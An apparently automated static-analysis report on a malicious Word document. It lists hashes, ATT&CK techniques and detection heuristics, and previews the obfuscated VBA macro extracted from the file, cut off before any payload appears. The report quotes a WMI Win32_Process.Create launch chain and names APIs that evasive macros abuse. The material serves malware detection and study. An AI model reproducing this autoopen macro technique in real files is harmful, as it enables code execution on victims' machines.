Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bed222f3898beaa9…

MALICIOUS

Office (OLE)

183.4 KB Created: 2019-04-12 19:51:00 Authoring application: Microsoft Office Word First seen: 2020-04-06
MD5: addba27d56abec9080e0d8b18ce3c616 SHA-1: 7fde8838940a3375812fe3b67d39940e45671dde SHA-256: bed222f3898beaa942aae55cf61fb207abf4f7d6953b26a26f4a8d69c2fd04fc
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.011 System Binary Proxy Execution: Rundll32

The sample contains a VBA macro with an autoopen subroutine, a common technique for malicious documents. The macro uses obfuscation and calls to GetObject and CreateObject to launch the Win32_Process WMI object, which is then used to create a new process. This indicates an intent to execute arbitrary code, likely to download and run a second-stage payload. The specific WMI call `CreateObject("winmgmts:\\.\root\cimv2:Win32_Process").Create` is a strong indicator of this behavior.

Heuristics 9

  • ClamAV: Doc.Malware.Sagent-6941569-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Sagent-6941569-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 35180 bytes
SHA-256: fceed5a4aaa43589a9ea8b0bbc3b44da9c2356c195051456b613f3cd92adaded
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "fDxGXAA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "z_B1ABD"
Attribute VB_Base = "0{5F0DFD43-34CA-4786-926B-7E4F474D276F}{56B85D28-FC4C-464B-94D5-4CE52043D02B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "MADBoBoA"
Attribute VB_Base = "0{91FB0125-B629-4599-936E-C4CE710EEBE0}{016AE71B-96B8-4C2B-A11D-CDAC1615E706}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "pUBCxC"
Sub autoopen()
   If kAZAQQ = DADAA1BB Then
 MAAAAA = wAAZBA - OAAwDGAZ
      Select Case boBcD_
         Case 280192566
            I_oBA11 = CVar(802557533 * Rnd(coAAZx * Round(909399502) / 680125650 * CLng(425639914 * Sqr(KAA1XcU))))
            WwUB_1 = Round(HCDoXU)
         Case 831352818
            EACAABD = IABB1oAG
            ZXDXAA = Atn(536232444)
      End Select
End If
   If sQA_ADAD = mGDxUAZo Then
 kwU1BU = DBD4A1 - cZDA1Z
      Select Case BcACDZDX
         Case 585545420
            hkDA_Q = CVar(947076902 * Rnd(rk4DZ1 * Round(176817655) / 19671795 * CLng(794910960 * Sqr(KCZABD4w))))
            uAQABcX = Round(KAXAAAU)
         Case 571860622
            RDUwBAG4 = UAAQBCDB
            QcAAADx = Atn(35064767)
      End Select
End If
aUAA_UC
   If wAZACDA = OAxCZX1Q Then
 OoAUBC_ = Wk1XA_G - UAUUUA
      Select Case fkCQ41B
         Case 354236406
            j4AcZAUA = CVar(814867957 * Rnd(i_AAxUA * Round(138509867) / 898730787 * CLng(175663181 * Sqr(BADDQAA))))
            zAAwDAAA = Round(zXxxAk)
         Case 437275709
            HwBQkDAA = h4xAUAA
            iCcAAA = Atn(534306769)
      End Select
End If
   If wBocACAX = TAB_AAA Then
 PADAQUAQ = FAxAXD - RkAwBBx
      Select Case hUQBZAG
         Case 114861285
            ZDBZXcAB = CVar(123467529 * Rnd(UkAAUX * Round(715869169) / 82923710 * CLng(390295200 * Sqr(EAkAU_4))))
            KU_DAQ4 = Round(zcokUA)
         Case 599972638
            pACxAD = iUkAAc
            vGAw4CBU = Atn(844187480)
      End Select
End If
End Sub

Attribute VB_Name = "wQBAADQ"
Function aUAA_UC()
On Error Resume Next
   If TAACcQc = BXAUowB Then
 tADwc4 = sG__c1Ak - NZAxAo
      Select Case L4QocA
         Case 75347560
            b1AGGc = CVar(200960725 * Rnd(nkAAAB * Round(189600513) / 211093100 * CLng(321090088 * Sqr(r1wAUD))))
            wGBDAA = Round(dA4QCD1k)
         Case 348122217
            PcGQ1A = LDUc1Ac
            wQxoAAA = Atn(873012742)
      End Select
End If
   If JQXQxZ = IAxBZoAX Then
 FUQUBA1Z = AXDAUo - zDCUDAD
      Select Case lDQUAAUU
         Case 918578058
            KkAQw1Ac = CVar(173295352 * Rnd(hA_X_BU * Round(45651812) / 636582741 * CLng(46408860 * Sqr(cAZABo))))
            ZwUUoDU = Round(FUAA1A)
         Case 349933414
            rQcoxAQQ = lZCD_A
            mA1UABx = Atn(526896309)
      End Select
End If
   If NAQcAX = pABABUA Then
 nD1AAZ = PXcXAw - AAAXoQGC
      Select Case nA1GDADA
         Case 877355486
            OCADoAcC = CVar(248700971 * Rnd(LxBkBB * Round(137761081) / 978677350 * CLng(679138766 * Sqr(fUXAAD))))
            RAZDUA = Round(A_UcXA)
         Case 549878653
            FC1QQA = AAAoAU
            HwoUAB = Atn(807538438)
      End Select
End If
If 9044 < 15165 Then
tUoUAwQ_ = 0
   If skwBAQAA = qxC_AA Then
 aAx4D1AA = CCQUUwAU - UQAoAxD
      Select Case r1DoxU
         Case 746646378
            CAGDwG = CVar(873329916 * Rnd(FAUkQUB * Round(587131089) / 739187409 * CLng(497693669 * Sqr(DwoB__CD))))
            hADAAB = Round(ExA4cUZ
... (truncated)